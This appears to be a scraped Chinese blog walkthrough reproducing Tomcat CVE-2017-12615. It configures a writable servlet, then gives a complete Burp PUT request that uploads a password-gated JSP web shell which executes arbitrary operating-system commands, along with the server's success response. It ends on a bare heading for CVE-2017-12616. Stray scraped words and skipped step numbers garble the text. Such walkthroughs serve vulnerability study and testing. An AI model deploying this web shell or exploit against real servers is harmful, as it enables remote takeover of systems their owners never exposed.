1、CVE-2017-12615java
參照:http://blog.csdn.net/qq1124794084/article/details/78044756web
復現方法:tomcat
一、下載tomcat 7.0.21服務器
二、修改conf/web/xml文件添加readonly爲falseapp
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>webapp
三、啓動tomcatjsp
四、打開軟件Burp Suite Free Edition v1.7.27ui
五、在Burp Suite Free軟件的Repeater標籤欄輸入以下內容(備註:IP和端口爲tomcat運行的服務器的IP以及端口):spa
PUT /123.jsp/ HTTP/1.1 Host: 10.20.129.14:8080 User-Agent: JNTASS DNT:1 Connection: close Content-Length: 660.net
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>
六、單擊Go
七、在彈出框中輸入tomcat運行的服務器的IP以及tomcat的web端口
九、單擊Go
十、Response以下:
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Tue, 26 Sep 2017 07:07:31 GMT
Connection: close
十一、查看tomcat安裝目錄的webapps/ROOT目錄下可以看見123.jsp文件
2、CVE-2017-12616
server.xml文件VirtualDirContext